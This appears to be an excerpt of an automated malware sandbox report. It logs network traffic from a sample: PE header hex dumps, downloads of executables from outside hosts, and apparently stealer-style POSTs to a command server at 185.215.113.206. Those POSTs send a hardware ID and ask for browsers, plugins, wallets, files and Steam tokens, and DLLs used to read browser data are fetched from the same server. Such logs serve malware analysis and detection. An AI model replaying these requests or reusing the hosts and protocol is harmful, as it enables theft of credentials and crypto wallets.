00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 72 01 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 c0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 78 64 62 7a 63 6a 6a 00 20 1a 00 00 80 4f 00 00 16 1a 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 78 73 6e 6c 68 70 7a 00 10 00 00 00 a0 69 00 00 04 00 00 00 8c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 69 00 00 22 00 00 00 90 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 23:07:53 GMTContent-Type: application/octet-streamContent-Length: 1815040Last-Modified: Mon, 11 Nov 2024 22:52:56 GMTConnection: keep-aliveETag: "67328ac8-1bb200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 b0 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 69 00 00 04 00 00 66 58 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 72 01 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 c0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 78 64 62 7a 63 6a 6a 00 20 1a 00 00 80 4f 00 00 16 1a 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 78 73 6e 6c 68 70 7a 00 10 00 00 00 a0 69 00 00 04 00 00 00 8c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 69 00 00 22 00 00 00 90 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /l.exe HTTP/1.1Host: freewaylumma.online
Source: global traffic HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: freewaylumma.onlineConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /?ch=user%7cpgkoujvbvlam++++%7cSSD%7c6000c292b65879ff477a6af604113f58%7c48%7c7%3a58%7c5 HTTP/1.1Host: cl.oud-cdn.deConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /?ch=user%7cpgkoujvbvlam++++%7cSSD%7c6000c292b65879ff477a6af604113f58%7c48%7c7%3a58%7c5 HTTP/1.1Host: cl.oud-cdn.de
Source: global traffic HTTP traffic detected: GET /?ch=user%7cpgkoujvbvlam++++%7cSSD%7c6000c292b65879ff477a6af604113f58%7c48%7c7%3a58%7c5 HTTP/1.1Host: cl.oud-cdn.de
Source: global traffic HTTP traffic detected: GET /?ch=user%7cpgkoujvbvlam++++%7cSSD%7c6000c292b65879ff477a6af604113f58%7c48%7c7%3a58%7c5 HTTP/1.1Host: cl.oud-cdn.de
Source: global traffic HTTP traffic detected: GET /?ch=user%7cpgkoujvbvlam++++%7cSSD%7c6000c292b65879ff477a6af604113f58%7c48%7c7%3a58%7c5 HTTP/1.1Host: cl.oud-cdn.de
Source: global traffic HTTP traffic detected: GET /?vhyneVXjVGxXWDBAHPFQ=vMcvSUhjRwUjZHoUBOuO.txt HTTP/1.1Host: cl.oud-cdn.deConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIJKKFHIEGCBGCAFIJHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 43 36 45 43 41 31 33 38 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 2d 2d 0d 0a Data Ascii: ------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="hwid"80C6ECA1389A291931458------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="build"mars------AEHIJKKFHIEGCBGCAFIJ--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAEHJJECAEGCAAAAEGIHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 2d 2d 0d 0a Data Ascii: ------JDAEHJJECAEGCAAAAEGIContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------JDAEHJJECAEGCAAAAEGIContent-Disposition: form-data; name="message"browsers------JDAEHJJECAEGCAAAAEGI--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDBFIJKEBGIDGDHCGCHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 2d 2d 0d 0a Data Ascii: ------KEGDBFIJKEBGIDGDHCGCContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------KEGDBFIJKEBGIDGDHCGCContent-Disposition: form-data; name="message"plugins------KEGDBFIJKEBGIDGDHCGC--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEGCBFHJDHJJKFIDBGIJHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 2d 2d 0d 0a Data Ascii: ------IEGCBFHJDHJJKFIDBGIJContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------IEGCBFHJDHJJKFIDBGIJContent-Disposition: form-data; name="message"fplugins------IEGCBFHJDHJJKFIDBGIJ--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDGDBFCBKFHJKFHCBKHost: 185.215.113.206Content-Length: 5747Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCBAAAFHJDHJJKEBGHIHost: 185.215.113.206Content-Length: 999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIDBKKKKKFBGDGDHIDBHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 2d 2d 0d 0a Data Ascii: ------BGIDBKKKKKFBGDGDHIDBContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------BGIDBKKKKKFBGDGDHIDBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BGIDBKKKKKFBGDGDHIDBContent-Disposition: form-data; name="file"------BGIDBKKKKKFBGDGDHIDB--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFHIIEHIEGDHJJJKFIHost: 185.215.113.206Content-Length: 3087Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBKKKJJJKKEBGDAFIDHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 2d 2d 0d 0a Data Ascii: ------CFCBKKKJJJKKEBGDAFIDContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------CFCBKKKJJJKKEBGDAFIDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CFCBKKKJJJKKEBGDAFIDContent-Disposition: form-data; name="file"------CFCBKKKJJJKKEBGDAFID--
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJKJEHJJDAKECBFCGIDHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAAKFHIEGDGCAAAEGDGHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 41 41 4b 46 48 49 45 47 44 47 43 41 41 41 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 4b 46 48 49 45 47 44 47 43 41 41 41 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 4b 46 48 49 45 47 44 47 43 41 41 41 45 47 44 47 2d 2d 0d 0a Data Ascii: ------DAAAKFHIEGDGCAAAEGDGContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------DAAAKFHIEGDGCAAAEGDGContent-Disposition: form-data; name="message"wallets------DAAAKFHIEGDGCAAAEGDG--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEGHIJEHJDHIDHIDAEHHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 2d 2d 0d 0a Data Ascii: ------CAEGHIJEHJDHIDHIDAEHContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------CAEGHIJEHJDHIDHIDAEHContent-Disposition: form-data; name="message"files------CAEGHIJEHJDHIDHIDAEH--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBKFHJEBAAEBGDGDBFBHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 2d 2d 0d 0a Data Ascii: ------IDBKFHJEBAAEBGDGDBFBContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------IDBKFHJEBAAEBGDGDBFBContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IDBKFHJEBAAEBGDGDBFBContent-Disposition: form-data; name="file"------IDBKFHJEBAAEBGDGDBFB--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKKKFCFHCFIECBGDHIDHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 44 2d 2d 0d 0a Data Ascii: ------IJKKKFCFHCFIECBGDHIDContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------IJKKKFCFHCFIECBGDHIDContent-Disposition: form-data; name="message"ybncbhylepme------IJKKKFCFHCFIECBGDHID--
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
